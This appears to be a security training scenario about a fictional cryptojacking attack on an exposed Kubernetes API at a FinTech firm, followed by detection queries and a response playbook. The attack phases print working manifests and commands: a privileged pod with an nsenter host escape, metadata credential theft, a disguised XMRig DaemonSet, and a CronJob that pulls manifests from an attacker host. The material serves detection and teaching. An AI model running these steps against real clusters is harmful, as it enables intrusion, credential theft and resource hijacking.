Skip to content

SC-052: Cloud Cryptojacking Campaign

Scenario Overview

A threat actor discovers an exposed Kubernetes API server belonging to QuickPay Financial (a FinTech startup) through Shodan reconnaissance. The K8s API lacks authentication due to misconfigured RBAC policies, allowing the attacker to create privileged pods, deploy XMRig cryptocurrency miners across all available nodes, and laterally move to additional clusters in the same cloud account. The attack goes undetected for 23 days until the cloud provider sends an anomalous billing alert showing a $180K/month spike. During this period, production application performance degrades significantly, causing customer-facing latency issues.

Environment: QuickPay Financial AWS account; EKS clusters in us-east-1 and eu-west-1; Kubernetes v1.28 Initial Access: Exposed Kubernetes API server with anonymous authentication enabled (T1078.004) Impact: $180K/month cloud bill spike, production performance degradation, customer-facing latency Difficulty: Intermediate Sector: FinTech / Financial Services


Attack Timeline

Timestamp (UTC) Phase Action
2026-02-10 (Day -23) Reconnaissance Shodan scan identifies exposed K8s API at 192.0.2.50:6443
2026-02-10 14:30:00 Initial Access Attacker connects to unauthenticated K8s API; enumerates cluster
2026-02-10 14:45:00 Discovery Lists namespaces, nodes, service accounts, and secrets
2026-02-10 15:00:00 Execution Creates privileged pod with host mount in default namespace
2026-02-10 15:05:00 Privilege Escalation Escapes container via nsenter to host; accesses node kubelet
2026-02-10 15:30:00 Resource Hijacking Deploys XMRig DaemonSet across all nodes (8 nodes, 64 vCPUs)
2026-02-11 02:00:00 Persistence Creates CronJob for miner redeployment; backdoor ServiceAccount
2026-02-12 (Day -21) Lateral Movement Discovers and pivots to eu-west-1 cluster via shared IAM role
2026-02-12 10:00:00 Resource Hijacking Deploys miners to second cluster (12 nodes, 96 vCPUs)
2026-02-15 (Day -18) Defense Evasion Renames miner pods to resemble system components
2026-02-20 (Day -13) Impact Production latency spikes; SRE team attributes to "traffic growth"
2026-03-01 (Day -4) Impact AWS billing alert: $180K projected monthly spend (baseline: $22K)
2026-03-05 09:00:00 Detection Finance team escalates billing anomaly to engineering
2026-03-05 11:00:00 Investigation SRE discovers unauthorized pods running XMRig

Technical Analysis

Phase 1: Reconnaissance — Shodan Discovery

The attacker identifies the exposed Kubernetes API through internet-wide scanning services.

# Shodan query used by attacker (reconstructed):
# "kubernetes" port:6443 "200 OK"
# OR
# ssl:"kubernetes" port:6443 country:US

# Shodan result for target:
# IP: 192.0.2.50
# Port: 6443/tcp
# Product: Kubernetes API
# SSL: kubernetes (CN=kube-apiserver)
# HTTP Response: 200 OK
# Banner excerpt:
# {
#   "kind": "APIVersions",
#   "versions": ["v1"],
#   "serverAddressByClientCIDRs": [
#     {"clientCIDR": "0.0.0.0/0", "serverAddress": "192.0.2.50:6443"}
#   ]
# }

# The API server responds to unauthenticated requests
# indicating anonymous authentication is enabled
# RBAC misconfiguration: system:anonymous bound to cluster-admin

Phase 2: Initial Access and Cluster Enumeration

The attacker connects to the unauthenticated API and enumerates the cluster configuration.

# Attacker's kubectl commands (reconstructed from K8s audit logs)
# Source IP: 203.0.113.88

# Verify access
kubectl --server=https://192.0.2.50:6443 --insecure-skip-tls-verify \
  auth can-i '*' '*'
# Response: yes (cluster-admin via anonymous binding)

# Enumerate cluster
kubectl --server=https://192.0.2.50:6443 --insecure-skip-tls-verify \
  get nodes -o wide
# NAME              STATUS   ROLES    AGE   VERSION   INTERNAL-IP    OS-IMAGE
# node-prod-01      Ready    <none>   90d   v1.28.4   10.0.1.11      Amazon Linux 2
# node-prod-02      Ready    <none>   90d   v1.28.4   10.0.1.12      Amazon Linux 2
# ... (8 nodes total, m5.2xlarge instances — 8 vCPU / 32 GB each)

# List namespaces
kubectl get namespaces
# NAME              STATUS   AGE
# default           Active   120d
# kube-system       Active   120d
# production        Active   90d
# staging           Active   85d
# monitoring        Active   60d

# Enumerate secrets (looking for cloud credentials)
kubectl get secrets --all-namespaces -o json
# Found: AWS IAM role credentials in kube-system namespace
# ServiceAccount: aws-node (with cross-cluster IAM role)

# List service accounts
kubectl get serviceaccounts --all-namespaces
# Found: default SA in each namespace with automounted tokens

Phase 3: Privileged Pod Creation and Container Escape

The attacker creates a privileged pod with host filesystem access to escape the container.

# Privileged pod manifest (from K8s audit log)
# Created by: system:anonymous
# Source IP: 203.0.113.88
apiVersion: v1
kind: Pod
metadata:
  name: kube-proxy-health
  namespace: kube-system
  labels:
    k8s-app: kube-proxy
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: health-check
    image: alpine:latest
    command: ["/bin/sh", "-c", "sleep infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
  tolerations:
  - operator: Exists
  nodeSelector:
    kubernetes.io/os: linux
# Container escape via nsenter (from container runtime logs)
# Attacker execs into the privileged pod:
kubectl exec -it kube-proxy-health -n kube-system -- /bin/sh

# Inside the pod — escape to host:
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Now running as root on the host node
# Verify access:
whoami
# root

# Access kubelet credentials:
cat /var/lib/kubelet/kubeconfig
# Contains kubelet client certificate with node-level access

# Access AWS instance metadata (IMDS v1 — not enforced IMDSv2):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Response: eks-node-role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role
# Returns temporary AWS credentials for the node IAM role

Phase 4: Cryptominer Deployment via DaemonSet

The attacker deploys XMRig as a DaemonSet to mine Monero on all cluster nodes simultaneously.

# Cryptominer DaemonSet (from K8s audit log)
# Created by: system:anonymous
# Disguised as system monitoring component
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-metrics-collector
  namespace: kube-system
  labels:
    k8s-app: node-metrics
spec:
  selector:
    matchLabels:
      k8s-app: node-metrics
  template:
    metadata:
      labels:
        k8s-app: node-metrics
    spec:
      containers:
      - name: collector
        image: 203.0.113.99:5000/metrics-agent:latest
        # Actually contains XMRig cryptocurrency miner
        resources:
          requests:
            cpu: "6"
            memory: "2Gi"
          limits:
            cpu: "7"
            memory: "4Gi"
        env:
        - name: POOL_URL
          value: "stratum+tcp://pool.mining.example.com:3333"
        - name: WALLET
          value: "REDACTED"
        - name: WORKER_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        - name: CPU_THREADS
          value: "6"
      tolerations:
      - operator: Exists
      priorityClassName: system-node-critical
# XMRig configuration (extracted from container image)
{
    "autosave": false,
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "max-threads-hint": 85
    },
    "pools": [
        {
            "url": "stratum+tcp://pool.mining.example.com:3333",
            "user": "REDACTED",
            "pass": "x",
            "keepalive": true,
            "tls": false
        }
    ],
    "donate-level": 0
}

# Resource consumption per node:
# CPU usage: 85% of available cores (6 of 8 vCPUs per node)
# Total compute hijacked: 120 vCPUs across 20 nodes (both clusters)
# Estimated mining revenue: ~$800/day in Monero
# Victim cloud cost: ~$6,000/day in compute charges

Phase 5: Persistence Mechanisms

The attacker establishes multiple persistence mechanisms to survive pod restarts and cleanups.

# CronJob for miner redeployment (from K8s audit log)
apiVersion: batch/v1
kind: CronJob
metadata:
  name: system-maintenance
  namespace: kube-system
spec:
  schedule: "*/30 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: maintenance
            image: bitnami/kubectl:latest
            command:
            - /bin/sh
            - -c
            - |
              kubectl get ds node-metrics-collector -n kube-system || \
              kubectl apply -f https://203.0.113.99/manifests/ds.yaml
          restartPolicy: OnFailure
          serviceAccountName: backdoor-sa
# Backdoor ServiceAccount creation (from K8s audit log)
kubectl create serviceaccount backdoor-sa -n kube-system
kubectl create clusterrolebinding backdoor-binding \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:backdoor-sa

# Token extraction for persistent access:
kubectl create token backdoor-sa -n kube-system --duration=8760h
# Returns: eyJhbGciOiJSUzI1NiIsI... (valid for 1 year)

Phase 6: Lateral Movement to Second Cluster

The attacker discovers and pivots to the eu-west-1 cluster using shared IAM credentials.

# Lateral movement via AWS IAM (from CloudTrail logs)
# The node IAM role has permissions to describe and access other EKS clusters

# Discover clusters in the account:
aws eks list-clusters --region eu-west-1
# Output: { "clusters": ["quickpay-prod-eu"] }

# Get cluster credentials:
aws eks update-kubeconfig --name quickpay-prod-eu --region eu-west-1

# Verify access:
kubectl get nodes
# NAME              STATUS   ROLES    AGE   VERSION   INTERNAL-IP
# node-eu-01        Ready    <none>   45d   v1.28.4   10.1.1.11
# ... (12 nodes total, m5.2xlarge — 96 vCPUs)

# Deploy same DaemonSet to eu-west-1 cluster:
kubectl apply -f ds.yaml -n kube-system
# daemonset.apps/node-metrics-collector created

# Combined compute hijacked: 160 vCPUs across 20 nodes in 2 clusters

Detection Opportunities

KQL — Kubernetes Anonymous Authentication Access

// Detect anonymous or unauthenticated access to Kubernetes API
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where Category == "kube-audit"
| where log_s has "system:anonymous" or log_s has "system:unauthenticated"
| extend AuditEvent = parse_json(log_s)
| where AuditEvent.verb in ("create", "update", "patch", "delete", "get", "list")
| project TimeGenerated,
    Verb = tostring(AuditEvent.verb),
    Resource = tostring(AuditEvent.objectRef.resource),
    Namespace = tostring(AuditEvent.objectRef.namespace),
    SourceIP = tostring(AuditEvent.sourceIPs[0]),
    UserAgent = tostring(AuditEvent.userAgent)
| sort by TimeGenerated desc

KQL — Privileged Container Creation

// Detect creation of privileged containers or containers with hostPID/hostNetwork
AzureDiagnostics
| where TimeGenerated > ago(7d)
| where Category == "kube-audit"
| extend AuditEvent = parse_json(log_s)
| where AuditEvent.verb == "create"
| where AuditEvent.objectRef.resource == "pods"
| extend PodSpec = tostring(AuditEvent.requestObject.spec)
| where PodSpec has "privileged" or PodSpec has "hostPID"
    or PodSpec has "hostNetwork" or PodSpec has "hostPath"
| project TimeGenerated,
    PodName = tostring(AuditEvent.objectRef.name),
    Namespace = tostring(AuditEvent.objectRef.namespace),
    User = tostring(AuditEvent.user.username),
    SourceIP = tostring(AuditEvent.sourceIPs[0])
| sort by TimeGenerated desc

KQL — Cloud Cost Anomaly Detection

// Detect anomalous cloud compute cost spikes
AzureBillingUsage_CL
| where TimeGenerated > ago(30d)
| where MeterCategory_s == "Virtual Machines" or MeterCategory_s == "Container Instances"
| summarize DailyCost = sum(Cost_d) by bin(TimeGenerated, 1d)
| extend AvgCost = toscalar(
    AzureBillingUsage_CL
    | where TimeGenerated between (ago(60d) .. ago(30d))
    | where MeterCategory_s in ("Virtual Machines", "Container Instances")
    | summarize sum(Cost_d) / 30
  )
| where DailyCost > AvgCost * 3
| project TimeGenerated, DailyCost, AvgCost,
    CostMultiplier = round(DailyCost / AvgCost, 1)
| sort by TimeGenerated desc

KQL — Cryptocurrency Mining Network Indicators

// Detect connections to known mining pool ports and patterns
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationPort in (3333, 3334, 5555, 5556, 7777, 8888, 9999, 14444, 14433)
| where DeviceAction == "Allow"
| summarize
    ConnectionCount = count(),
    UniqueDestinations = dcount(DestinationIP),
    TotalBytesSent = sum(SentBytes),
    Duration = datetime_diff('minute', max(TimeGenerated), min(TimeGenerated))
    by SourceIP, DestinationPort
| where ConnectionCount > 10
| where Duration > 30  // Persistent connections
| sort by ConnectionCount desc

SPL — Kubernetes Audit Log: Unauthorized API Access

index=kubernetes sourcetype="kube:apiserver:audit"
  user.username="system:anonymous" OR user.username="system:unauthenticated"
  verb IN ("create", "update", "delete", "patch")
| stats count as api_calls
        dc(objectRef.resource) as unique_resources
        values(objectRef.resource) as resources
        values(verb) as actions
        by sourceIPs{} userAgent
| where api_calls > 5
| sort -api_calls

SPL — DaemonSet Creation Detection

index=kubernetes sourcetype="kube:apiserver:audit"
  verb="create"
  objectRef.resource="daemonsets"
| stats count by objectRef.name objectRef.namespace
        user.username sourceIPs{} _time
| sort _time

SPL — High CPU Usage Across Kubernetes Nodes

index=metrics sourcetype="kube:metrics"
  metric_name="container_cpu_usage_seconds_total"
| stats avg(metric_value) as avg_cpu by kubernetes_node _time span=1h
| where avg_cpu > 0.80
| stats count as high_cpu_hours
        avg(avg_cpu) as sustained_cpu
        by kubernetes_node
| where high_cpu_hours > 12
| sort -sustained_cpu

SPL — Stratum Protocol Detection (Mining Pool Communication)

index=network sourcetype="bro:conn:json" OR sourcetype="zeek:conn"
  id.resp_p IN (3333, 3334, 5555, 7777, 14444)
| stats count as connections
        sum(orig_bytes) as bytes_sent
        sum(resp_bytes) as bytes_received
        values(id.resp_h) as destinations
        by id.orig_h
| where connections > 10
| eval duration_hours = connections / 60
| sort -connections

Response Playbook

Immediate Containment (0-30 minutes)

  1. Restrict K8s API access: Apply network policy or security group to block external access to port 6443
  2. Delete malicious workloads: Remove DaemonSet, CronJob, and privileged pods
  3. Revoke backdoor ServiceAccount: Delete backdoor-sa and its ClusterRoleBinding
  4. Block mining pool connections: Add firewall rules blocking Stratum protocol ports (3333, 5555, etc.)
  5. Enforce IMDSv2 on all EC2 instances to prevent metadata credential theft
  6. Rotate AWS IAM credentials associated with EKS node roles

Eradication (30 minutes - 4 hours)

  1. Audit Kubernetes RBAC: Remove anonymous/unauthenticated ClusterRoleBindings
  2. Enable K8s API authentication: Require OIDC or certificate-based authentication
  3. Scan all container images for cryptocurrency miners (check for xmrig, cpuminer binaries)
  4. Review all ServiceAccounts and remove unnecessary cluster-admin bindings
  5. Implement Pod Security Standards: Enforce restricted policy (no privileged pods, no hostPID)
  6. Rotate all secrets in the affected clusters (K8s secrets, ConfigMaps with credentials)
  7. Audit CloudTrail logs for unauthorized IAM actions from compromised node roles

Recovery (4-48 hours)

  1. Implement OPA/Gatekeeper policies to prevent privileged pod creation
  2. Deploy Falco or runtime security for real-time container threat detection
  3. Set up cloud cost alerting with aggressive thresholds (50% above baseline)
  4. Implement network policies restricting pod egress to known-good destinations
  5. Enable Kubernetes audit logging to a centralized SIEM
  6. Restrict node IAM roles to minimum necessary permissions (no cross-cluster access)
  7. Deploy Kubernetes admission controller to block images from untrusted registries
  8. Conduct architecture review of cloud security posture with focus on K8s hardening

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Scenario Phase
Reconnaissance T1595.001 Active Scanning: Scanning IP Blocks Shodan discovery of K8s API
Initial Access T1078.004 Valid Accounts: Cloud Accounts Anonymous K8s API access
Execution T1609 Container Administration Command kubectl commands to deploy miners
Execution T1610 Deploy Container Privileged pod and DaemonSet creation
Persistence T1053.007 Scheduled Task/Job: Container Orchestration Job CronJob for miner redeployment
Privilege Escalation T1611 Escape to Host nsenter container escape
Defense Evasion T1036.005 Masquerading: Match Legitimate Name Pods named as system components
Discovery T1613 Container and Resource Discovery K8s namespace and node enumeration
Lateral Movement T1021.004 Remote Services: SSH Pivot to second cluster via IAM
Impact T1496 Resource Hijacking Cryptomining on 160 vCPUs

Lessons Learned

  1. Kubernetes API servers must never be publicly accessible without authentication: The root cause was anonymous authentication enabled with cluster-admin privileges. The K8s API should be behind a private endpoint or VPN, with OIDC or certificate-based authentication enforced. Regular Shodan/Censys scans of your own infrastructure can identify these exposures before attackers do.

  2. RBAC misconfigurations are the most common Kubernetes attack vector: The binding of system:anonymous to cluster-admin is a critical misconfiguration. Automated RBAC auditing tools (like rbac-police or kubectl-who-can) should be run as part of CI/CD and regular security assessments.

  3. Pod Security Standards must be enforced: The attacker created privileged pods with hostPID and hostPath mounts, which are never needed for legitimate application workloads. Enforcing the "restricted" Pod Security Standard prevents container escapes and host access.

  4. Cloud cost monitoring is a legitimate security detection mechanism: The attack was ultimately detected through billing anomalies, not security tooling. Organizations should treat unexpected cost spikes as potential security incidents and integrate cloud cost alerts into their security monitoring workflow.

  5. Cross-cluster IAM permissions enable lateral movement: The shared IAM role between clusters allowed the attacker to pivot from us-east-1 to eu-west-1. Each cluster should use dedicated IAM roles with minimal permissions, and cross-cluster access should require explicit authentication.

  6. Runtime container security is essential: No runtime security tool (Falco, Sysdig, Aqua) was deployed to detect the container escape or cryptominer execution. Static scanning of container images is insufficient — runtime behavioral detection is needed to identify threats like cryptocurrency miners that may not be present in the original image.


Cross-References